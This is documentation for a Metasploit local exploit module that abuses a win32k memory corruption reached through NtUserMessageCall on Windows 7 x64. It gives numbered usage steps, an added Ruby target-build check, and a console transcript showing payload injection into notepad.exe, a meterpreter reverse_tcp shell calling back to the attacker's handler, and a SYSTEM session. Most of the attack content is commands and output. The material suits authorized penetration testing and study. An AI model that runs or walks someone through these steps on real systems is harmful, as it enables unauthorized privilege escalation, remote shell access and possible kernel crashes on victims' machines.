metasploit-gs/documentation/modules/exploit/windows/local/ntusermessagecall.md
2020-10-15 10:58:08 -05:00
## Vulnerable Application

This module exploits a memory corruption vulnerability in win32k.sys, the kernel-mode window manager, that is reachable from user mode through the NtUserMessageCall() system call. Successful exploitation elevates an existing low-privileged session to NT AUTHORITY\SYSTEM.

This module has been tested against Windows 7 x64 SP1 only. Offsets within the exploit are specific to that build and may need to be adjusted to work with other versions of Windows; because the corruption happens in the kernel, running it against an untested build can crash the target (BSOD) rather than fail cleanly.

## Verification Steps

  1. Get a non-SYSTEM meterpreter session on Windows 7 x64
  2. use exploit/windows/local/ntusermessagecall
  3. set session <session>
  4. set payload windows/x64/meterpreter/reverse_tcp (the target and session are x64, so an x64 payload is required; this is also the module's default if no payload is set)
  5. set LHOST <LHOST>
  6. set LPORT 5555
  7. exploit
  8. Get a SYSTEM session
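Because the offsets are build-specific and a mismatch crashes the target rather than failing cleanly, it is worth gating a kernel exploit on the exact build and architecture the session reports before running it. The Ruby below (Metasploit's own language) is an added example, not code from the module or this documentation, and does not reproduce the module's real automatic check; it parses the `sysinfo` output format shown in the scenario below and compares it against a supported-target list that, as an assumption, contains only the build named above. The sample inputs are constructed from the transcript.

```ruby
# Added example, not code from the Metasploit module or its documentation:
# gate a kernel exploit on the exact build and architecture the session
# reports, because win32k offsets that do not match the running kernel
# crash the target instead of failing cleanly. The input format is the
# `sysinfo` output of a meterpreter session, as shown in the scenario.

# Targets this example treats as supported. Assumption: only the build the
# documentation says the module was tested against (Windows 7 SP1 x64).
SUPPORTED_TARGETS = [
  { major: 6, minor: 1, build: 7601, sp: 1, arch: 'x64' },
].freeze

# Sample sysinfo output, constructed to match the transcript on this page.
SAMPLE_WIN7_X64 = <<~SYSINFO
  Computer        : USER-PC
  OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
  Architecture    : x64
  System Language : en_GB
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
SYSINFO

# Constructed counter-examples: the same OS seen from a 32-bit session, and a
# newer Windows whose version string carries no service pack.
SAMPLE_WIN7_X86 = SAMPLE_WIN7_X64.sub('Architecture    : x64', 'Architecture    : x86')
SAMPLE_WIN10_X64 = <<~SYSINFO
  Computer        : DESKTOP-TEST
  OS              : Windows 10 (10.0 Build 19041).
  Architecture    : x64
SYSINFO

# Parse "Key : Value" lines into a Hash; lines without a colon are ignored.
def parse_sysinfo(text)
  text.each_line.with_object({}) do |line, info|
    key, value = line.split(':', 2)
    next if value.nil?
    info[key.strip] = value.strip
  end
end

# Pull major.minor, build and service pack out of a string such as
# "Windows 7 (6.1 Build 7601, Service Pack 1)."; nil if it does not match.
def parse_os_version(os_string)
  m = os_string.match(/\((\d+)\.(\d+) Build (\d+)(?:, Service Pack (\d+))?\)/)
  return nil unless m
  { major: m[1].to_i, minor: m[2].to_i, build: m[3].to_i, sp: (m[4] || 0).to_i }
end

# :supported when build, service pack and architecture all match a known
# target; :unsupported on a mismatch; :unknown when the output cannot be parsed.
def target_status(sysinfo_text)
  info = parse_sysinfo(sysinfo_text)
  version = parse_os_version(info.fetch('OS', ''))
  return :unknown if version.nil? || info['Architecture'].nil?
  SUPPORTED_TARGETS.include?(version.merge(arch: info['Architecture'])) ? :supported : :unsupported
end

if __FILE__ == $PROGRAM_NAME
  { 'Windows 7 SP1 x64' => SAMPLE_WIN7_X64,
    'Windows 7 SP1 x86' => SAMPLE_WIN7_X86,
    'Windows 10 x64' => SAMPLE_WIN10_X64 }.each do |name, text|
    puts "#{name}: #{target_status(text)}"
  end
end
```

The decision is deliberately strict: an exact match on major, minor, build, service pack and architecture, so that a Windows 7 session that is merely 32-bit, or a build the offsets were never derived for, is refused instead of being allowed to corrupt the kernel pool.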

## Scenarios

### Windows 7 SP1 x64

```
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x64/windows  User-PC\User @ USER-PC  192.168.56.1:4444 -> 192.168.56.6:49157 (192.168.56.6)

msf5 exploit(multi/handler) > use exploit/windows/local/ntusermessagecall
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set session 1
session => 1
msf5 exploit(windows/local/ntusermessagecall) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermessagecall) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermessagecall) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermessagecall) > run

[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 1808 launched.
[*] Injecting exploit into 1808 ...
[*] Exploit injected. Injecting payload into 1808...
[*] Payload injected. Executing exploit...
[*] Sending stage (201283 bytes) to 192.168.56.6
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.6:49158) at 2020-07-10 17:10:54 +0800

meterpreter > sysinfo
Computer        : USER-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```